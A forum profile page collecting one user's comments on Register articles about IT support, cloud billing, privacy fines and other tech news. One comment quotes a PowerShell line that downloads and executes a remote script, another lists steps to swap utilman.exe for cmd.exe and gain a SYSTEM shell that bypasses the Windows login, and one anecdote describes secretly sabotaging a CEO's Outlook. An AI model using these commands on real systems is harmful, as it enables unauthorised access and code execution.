* Posts by Stu J

141 posts • joined 5 Aug 2009

Come fly with me. But first we need to find a boot device

Stu J

Could be worse...

The company I worked for commissioned hundreds of displays in a US airport about 10 years ago. Unfortunately someone forgot to update the commissioning instructions to confirm that the "AC Power Failure" behaviour was correctly set in the BIOS to "Power On", and a bug in the BIOS meant that it forgot the previous power state.

When the airport power failed for no more than 15 mins, a small group of panicked 1st line guys had to scurry round the airport with step ladders and scissor lifts to poke the Power button on every single display controller... And then go round them all at night with a USB keyboard and change the BIOS settings to ensure they always powered back on after a power failure!

Undebug my heart: Using Cisco's IOS to take down capitalism – accidentally

Stu J

Reminds me of a former colleague in 1st line support that would occasionally remotely run pssuspend on outlook.exe on the CEO's laptop, be first to answer the phone when it rang, then would magically fix the issue. The CEO loved how responsive and attentive he was, and always managed to fix the issue within a few minutes.

AWS offers you the opportunity to pay cloud bills before they’ve been issued

Stu J

Interesting...

One regular gripe AWS has been dealing with for years has been the fact that there's no foolproof way to stop sandbox/dev accounts from accidentally running up massive bills. I wonder/hope if this is the first step towards accounts where you don't have to attach a credit card, and when your balance hits zero, your services switch off and your costs stop rising...

Would mean they could potentially do away with the Free Tier, reduce the pricing of the lowest tier of each service to compensate, and credit new accounts with $200, or something like that.

Fingers crossed...

UK Special Forces soldiers' personal data was floating around WhatsApp in a leaked Army spreadsheet

Stu J
FAIL

Fuckssake

:facepalm:

A trip to the dole queue: CEO of $2bn Bay Area tech biz says he was fired for taking LSD before company meeting

Stu J

Re: Stoned web design

https://xkcd.com/323/

The wrong guy: Backup outfit Spanning deleted my personal data, claims Cohesity field CTO

Stu J

What a tool...

Didn't read the EULA.

Didn't do his sums.

If it's too good to be true, it probably is.

Assuming even at bulk hard disk prices with no resilience, you're talking at least $10 per TB, or minimum $360 for the amount he was storing. Mirror it and it's $720. And then there's data transfer costs too. Far less than the total amount he paid. He thought it was a "win-lose" situation, it was actually a "lose-lose" situation.

It's AWS-hosted - and even at Glacier prices, 36TB would be $1770 per year. No wonder they fucked him off, the only surprise is they didn't do it much MUCH sooner...!

Also, if they'd let him export his 36TB backup, then the AWS Data Egress charges would have been over $3,000. I'm not surprised they just threw it in the bin if they were legally covered to do so...

Rookie's code couldn't have been so terrible that it made a supermarket spontaneously combust... right?

Stu J

Re: The power of coincidence

I once pressed "Online" on my parents' dot matrix printer (my mum couldn't get it to print, for obvious reasons), and the electrical substation opposite their house exploded...

We didn't collude with Twitter to throw Parler off our servers, says AWS in court filing

Stu J
Trollface

Re: False

Why would Melania be taking a flight to a suburb of North Manchester anyway? ;-)

Pizza and beer night out the window, hours trying to sort issue, then a fresh pair of eyes says 'See, the problem is...'

Stu J

Boiler

Once called out a boiler repair service to fix my boiler which wasn't coming on at all. The guy flipped open the front panel, and flicked the timer control switch from "off" to "manual", the boiler fired up immediately, and he thanked me for the easiest job he'd had all day, and knocked off an hour or two earlier than he'd expected to.

My wife and kids all denied having touched the switch. I knew I hadn't, and had assumed because it was in a cupboard behind the front panel that nobody else would have touched it. Never figured to actually check...

Samsung to introduce automatic call blocking on Android 11-capable flagships

Stu J

Play along

The best thing you can do - if you have the time - is play along with them.

"Oh there's a problem with my Internet? Someone's hacked it? How terrible!"

And when they start giving you instructions, pretend that you're following them, but with the skill and pace of a blind octogenarian. Tell them you've just turned your PC on and it's installing Windows Updates. Keep them waiting a good 10-15 minutes while updating them on the fictional percentage from time to time.

When they get to the point where they ask you to download TeamViewer or something similar, tell them it's taking a long time to download. Eventually pretend you've done it. But it wants you to reboot as part of the installation process. Reboot. More Windows Update fun on reboot. When they eventually ask for the TeamViewer code, make up some bollocks number. Then start questioning yourself "is that a 1 or an I". Eventually they'll probably give up.

Basically if you can keep them on the line for half an hour, that's half an hour they can't be scamming some poor bastard who doesn't know any better. It makes their business model a bit less profitable.

Devs strung up about .NET 5.0 string changes that may break working code are told: It's not a bug, it's a feature

Stu J

Re: To be fair to Microsoft

It was best practice back when I did my MCPD in .NET 2.0 (here be dragons) to *explicitly* specify both the culture for certain methods (often just Invariant, or using e.g. ToUpperInvariant), and the comparison method, because if someone buggered about with the Culture settings in Windows, your application could end up behaving differently.

Not a lot of sympathy if people have been too lazy to do it or get a linter to do it for them to be honest... They're the same people that don't pay attention to the collation settings on databases then wonder why queries don't behave as expected on some deployments...

Microsoft to pull support for PHP: Version 8? Exterminate, more like...

Stu J

Re: PHP

Nope, not trolling. I used PHP in a past life for a couple of years. It's very easy to do simple things very badly, and quite difficult to do complicated things well, compared to other languages and frameworks.

PHP's a toy language really. As a hiring manager I certainly wouldn't hold having worked with PHP against anyone, but anyone that thought it was a good technology choice for a new project wouldn't be coming back for a second interview. I can't honestly think of a use case for it any more where there isn't an obvious better choice.

Stu J
Flame

PHP

Just needs to f**k off and die already.

By emptying offices, coronavirus has hastened the paperless office

Stu J

Re: erm, homeschooling

Yeah, stationery companies have started offering me corporate discounts on paper and ink refills.

In Hancock's half-hour, Dido Harding offers hollow laughs: Cake distracts test-and-trace boss at UK COVID-19 briefing

Stu J

I got the test result late on Friday night, negative as expected.

What feels like the biggest con, is that allegedly they're treating the home test they send out as 2 tests, because you're swabbing both your tonsils and one of your nostrils. But it's the same swab for both locations (tonsils first, then nostril), sent to the lab in a single tube.

If it is true, it's a scam of the highest order, purely designed to make the test capacity look higher than it is. It may also explain why they refuse to detail the number of people tested - when they could clearly get that data, as you have to enter your NI number to order the test......

Stu J
Pint

I ordered a test on Monday (as part of a study, I've not got symptoms, just hay fever).

It was delivered on Tuesday.

I did it on Tuesday night and a courier collected it on Wednesday morning.

Still not had a result.

If I was ill, contact tracing wouldn't have started by now, and people I'd potentially infected would still be wandering round oblivious.

Whereas the Ceredigion tracing process was based on people being symptomatic, not testing positive. Which is why they've only had 46 cases in the entire county.

The testing clearly still isn't fit for purpose, and by extension neither is the tracing. Piss up and brewery spring to mind.

In fact, it's beer-o-clock...

It could be 'five to ten years' before the world finally drags itself away from IPv4

Stu J

I keep trying...

Every few weeks I turn on IPv6. And after 2 or 3 days, when some of the websites I visit don't load any photos or pictures, I turn it off again. Either my wifi or router's flaky, or something else is. But IPv4 "just works" and IPv6 "stops working" frequently...

UK, Ireland users call on SAP to extend indirect licensing deadline again as COVID-19 ravages project plans

Stu J
Flame

Licensing indirect access per "user" is a fucking scam

That is all

Brit IT infrastructure giant Computacenter hits pause on shareholder dividends after furloughing 10% of staff

Stu J

Surely no sensible company should be thinking about paying dividends at the moment - if you've got cash in the bank, use it to pay your staff if possible, and otherwise use it to keep yourself afloat until the current crisis passes......?

Microservices guru warns devs that trendy architecture shouldn't be the default for every app, but 'a last resort'

Stu J

Re: Glad I read this

It's not always a valid approach though.

Running multiple instances of a monolith (and by this I'm talking about some of the enterprise-sized monoliths I've come across that required upwards of 32GB/RAM per instance just to get them online...) can be very expensive, and unless your monolith has been explicitly designed to scale horizontally, you invariably run into problems with session management to the extent that it's often impossible to scale dynamically, so you end up over-provisioning to cope with peak load.

I'm a big fan of the strangler pattern - stick a proxy load-balancer in front of all API calls to your monolith, and once you've identified particular areas that you want to be able to scale dynamically and rapidly, break those out as microservices and redirect the calls from the load-balancer to those services, then remove that functionality from the monolith. There's no real reason why the optimal solution shouldn't be a combination of monolith and microservices.

Criminalise British drone fliers, snarl MPs amid crackdown demands

Stu J

This is the only place you really need to look

https://drones.nats.aero/page/app

The bits that are pink and are Class D Airspace aren't prohibited, you've just got to be aware. For example, the Class D airspace above me is part of the Manchester CTR, and although aircraft traverse it going in to both Liverpool and Manchester, they shouldn't ever be below 1,400ft (if they are, we got bigger problems given how far out from both airports I am), and my drone should never be above 400ft, so there shouldn't ever be a risk of conflict.

Specifically, the CAA states: "There are no separate regulations in place regarding the flight of small unmanned aircraft in controlled airspace below 400 ft (Class A,B,C,D,E)", so even though I'm technically in Class D airspace SFC-3500, as far as drones go it's 400-3500, which is a moot point.

TL;DR - There's plenty of places you can fly your drones.

Stalking cheap Chinese GPS child trackers is as easy as 123... 456 – because that's the default password on 600k+ of these gizmos

Stu J

Kite Mark?

About time we had some sort of Kite Mark/CE certification for IoT crap that at the very least checked that it wasn't this bloody easy to hack...

Microsoft Surface users baffled after investing in kit that throttles itself to the point of passing out

Stu J

I'm just guessing here that - in context - it might be:

PROCessor HOT

?

UK privacy watchdog threatens British Airways with 747-sized fine for massive personal data blurt

Stu J

Pretty sure fines aren't tax-deductible...

Edit:

https://www.gov.uk/hmrc-internal-manuals/business-income-manual/bim42515

"Regulatory bodies

Where a trader incurs a liability to a regulatory body on revenue account that is broadly intended to cover the regulator’s costs of performing its duties in relation to the trading activities, such costs will normally be allowable even where the trader has committed a breach of regulations. However, should a regulatory body impose a penalty for breach of regulations, or should a penalty or fine become payable as a result of a prosecution for a trader’s breach of regulations, this will not be an allowable expense (see McKnight v Sheppard [1999] 71TC419)."

Trolling in the Reg's forums... we mean, er, 'working' on the train still rubbish thanks to patchy data coverage

Stu J

Definite improvement...

I've just started commuting by train again after a hiatus of about 7 years, and was pleasantly surprised that I get 4G almost all the way to work - good enough to maintain a usable SSH session, and to actually "work" on the train.

The journey takes about an hour, and is mostly rural, and 7 years ago there was bugger all coverage for most of it - and what there was was 2G at best in the small towns and villages, and very little in-between. Now it seems the only not-spot is as we come into the suburbs on the edge of the city...

Sysadmin cracked military PC’s security by reading the manual

Stu J

Windows

1. Take hard disk out of PC

2. Hang on another PC

3. Copy cmd.exe over the top of utilman.exe (may need to fart about with permissions)

4. Put hard disk back in original PC and boot

5. Click on accessibility icon when Windows Logon screen appears

6. Marvel at the command prompt that appears running in the context of SYSTEM

7. Use command line tools to create a new user, as member of administrators group

8. Full logged-in admin access to operating system at your fingertips

Yes, Bitlocker generally thwarts this approach; but it's a fairly quick way to earn £50 for unlocking people's home PCs when they've managed to forget their password.

National ID cards might not mean much when up against incompetence of the UK Home Office

Stu J

NI Number is already created (if not formally "issued") at birth, as anyone with children who have "Child Trust Funds" will no doubt have spotted that their child's unique reference number follows a suspiciously familiar alphanumeric pattern...

Boss sent overpaid IT know-nothings home – until an ON switch proved elusive

Stu J

Cables under desks

As a summer job when at Uni, I worked in desktop support at a government scientific research establishment. One day I got a ticket to go and deal with the brand new CEO, who was some incredibly eminent Professor in his field. He couldn't get Outlook to update his email. After a quick ping determined no network connectivity, I followed the purple network cable out of the back of his PC, under his desk, where it was tangled with a green network cable, which was plugged into the wall socket. Plug the purple cable into the wall, and hey presto everything worked... He sheepishly admitted he'd rearranged his own office furniture and recabled things himself...

Sysadmin unplugged wrong server, ran away, hoped nobody noticed

Stu J

My bet is that it was Harwell...

(radioactive)

'Every little helps'... unless you want email: Tesco to kill free service

Stu J

Re: Damn

+1 for Fastmail, 14-year satisfied customer here...

Apple, if you want to win in education, look at what sucks about iPads

Stu J

Walled Garden

There is no way schools should be buying in to walled gardens of any form with the taxpayer's money.

UK worker who sold customers' data to nuisance callers must cough up £1k

Stu J

Computer Misuse Act

Why wasn't he prosecuted (and jailed) under the Computer Misuse Act for unlawfully accessing a computer system for unauthorised purposes (i.e. nicking the data)...?

Electric cars to create new peak hour when they all need a charge

Stu J

Re: actually no

As per some other comments, most EVs can cope with a two-way commute plus some nipping about in the evening without a recharge...

And similarly, per comments about letting the market decide - that's where smart meters come in. My car's configured not to charge between 4pm and 11:59pm, simply because my per-unit rate jumps from 11p to 24p at 4pm, back down to 11p at 7pm, and down to 5p between midnight and 6am. The only way I'm ever going to charge between 4pm and midnight is if I'm desperate... So market forces can, do, and will help spread the "load" (literally and figuratively)

OK, Google: Why does Chromecast clobber Wi-Fi connections?

Stu J

Re: when in tandem...

Even better - go for the VigorBX 2000n...

> in-built VDSL modem

> 4G dongle backup option (if you want/need it)

> VOIP PBX capability (it even supports your existing analogue line and phone, but the sound quality's a bit crappy - VOIP calls using a VOIP provider is perfect though)

WW2 Enigma machine to be seized from shamed pharma bro Shkreli

Stu J

Re: The sole copy of Once Upon a Time in Shaolin

Giving it away for free wouldn't be distributing it commercially...

UK council fined £150k for publishing traveller family's personal data

Stu J

Grrrr

Once again, the taxpayer coughs up and the council cretins just waste more taxpayers' money.

It's about time the legislation held individuals in public sector organisations personally accountable.

If the drone responsible for the breach is paid £20k, their boss £40k, their boss £80k, and the CEO of the council £160k, then the fine should be levied vaguely proportionately on their take-home pay over the next year - the drone should pick up £0 (but may well be fired if it can be shown they've blatantly disregarded procedure), the boss £10k, the next boss £30k, the CEO £70k, and the council forced to invest the remaining £40k into systems and processes to stop it from happening again...

Panasonic wants you to wear Li-Ion batteries. The ones that explode

Stu J

Re: PCMCIA

I had a PCMCIA CD-ROM drive for my A1200...

Alleged hacker Lauri Love loses extradition case. Judge: Suicide safeguards in place

Stu J

This should be simple...

Did he ever set foot in the USA during, or since he committed the crime?

If no, then the USA have no jurisdiction over this case, end of, and any extradition should be automatically denied on that basis.

He should be tried in the UK though, and Asperger's isn't a defence, although it may be a mitigating factor when it comes to sentencing.

App-V birthday to you, Win10: Virty tools baked in Anniversary update

Stu J

And so it begins...

Con people into using a technology, then one Windows update later, it's gone. You want it back? £££££...

Rinse, repeat.

Brexit? Cutting the old-school ties would do more for Brit tech world

Stu J

You don't need money to get into Oxford or Cambridge

Just saying...

ICO fines NHS trust £185K for publicly airing personnel files

Stu J

Re: Im sorry

If it's not the NHS, it's the councils losing their own taxpayers' data, then paying the fine with...their taxpayers' taxes...

Sod firing them, let's start with jail time for the execs at the top. And work down the chain. And until each level in the chain can prove that they've done everything possible to prevent data breaches, in terms of systems, policies, and training, only then does the lowly minion who actually copied the stuff onto a USB stick and left it on a train get jail time.

It's the only way the decision makers will ever take it seriously.

And no taxpayer funded body should EVER be fined, no matter what they do. It should always be someone either losing their job, or going to prison.

Finance bods SWIFT to update after Bangladesh hack

Stu J

Cheap switches usually don't have the capability to manage and monitor, and cheap second-hand switches are usually cheap because they're EoL or near as damn it - which means any vulnerabilities in the firmware won't be fixed.

The choice of such switches at that time doesn't necessarily mean they weren't fit for purpose at that point in time, however at best it's a short-sighted approach that reflects the attitude of the morons that put them in place. More telling, however, is the lack of firewall. That's just a case of "WTF???"

The web is DOOM'd: Average page now as big as id's DOS classic

Stu J

Re: Yep

Seem to remember it fit on a single 880KB floppy on the Amiga...

India orders 770 million LED light bulbs, prices drop 83 per cent

Stu J

Re: Who's paying the piper?

JFYI, there are LED streetlight replacement projects running in various areas of the UK...

Get lost, Windows 10 and Phone fans: No maps HERE on Microsoft's OS

Stu J

Re: I like Here.

Don't think that's anything specifically to do with the app somehow, unless it's not using the full capabilities of the GPS?

I often use Google Maps on commuter flights at speeds ranging from 0-500mph, altitudes from 0ft to 40,000ft, and never have any problems with it once the GPS locks on - and sluggish GPS lock-on isn't really an app issue.

Attackers packing malware into PowerShell

Stu J

The power of PowerShell

This:

iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w")

SpaceX Falcon 9 grounded by 'sledgehammer' winds

Stu J

Re: Why super-cooled fuel?

Anecdotally, the diameter of the SpaceX rockets was limited by the height of the lowest bridge that Elon Musk couldn't pay to have raised or demolished, between the factory and their original test site, minus the height of the low-loader the rockets were shipped on...

Now you can easily see if a site's HTTP headers are insecure, beams dev

Stu J

Hall of Shame

As of 11:51 GMT, "www.theregister.co.uk" is top of their Hall of Shame :-)

And no, it wasn't me that tested it, it was like that when I clicked on the link!

TalkTalk hired BAE Systems' infosec bods before THAT hack

Stu J

TalkTalk customers - have some balls!

Just cancel your direct debit, write to TalkTalk, send them a cheque for the value of any service up to today's date so that you're fully paid up, tell them that as they have breached their due care you are unilaterally terminating your contract with them, you will no longer consume their services (i.e. unplug everything), you require them to release your MAC with immediate effect, and that you reserve the right to take further civil or criminal action against them in the event of any losses incurred, including any loss caused by not being able to use phone/Internet caused by them delaying the release of your MAC, and any legal costs incurred if they force you to take the matter to court.

Sysadmin ignores 25 THOUSAND patches, among other sins

Stu J

Re: 25,000 patches sounds pretty bad, but...

And how does one know without manually auditing every single patch?

WSUS tells you whether patches are standalone, or if they supersede or are superseded by (or both) other patches. It's very easy to select all superseded patches and decline them, as a starter for ten...

Also, given the job this useless tit had done, it wouldn't surprise me if he'd not selected the correct product types/languages, and appropriate levels of patching, which probably would have reduced the 25,000 considerably. Additionally, older versions of Windows included patches for Itanium/IA64 which a quick search/decline in WSUS would knock a fair few off the list too (guessing on a hunch that they weren't running Itanium infrastructure).

Biting the hand that feeds IT © 1998–2021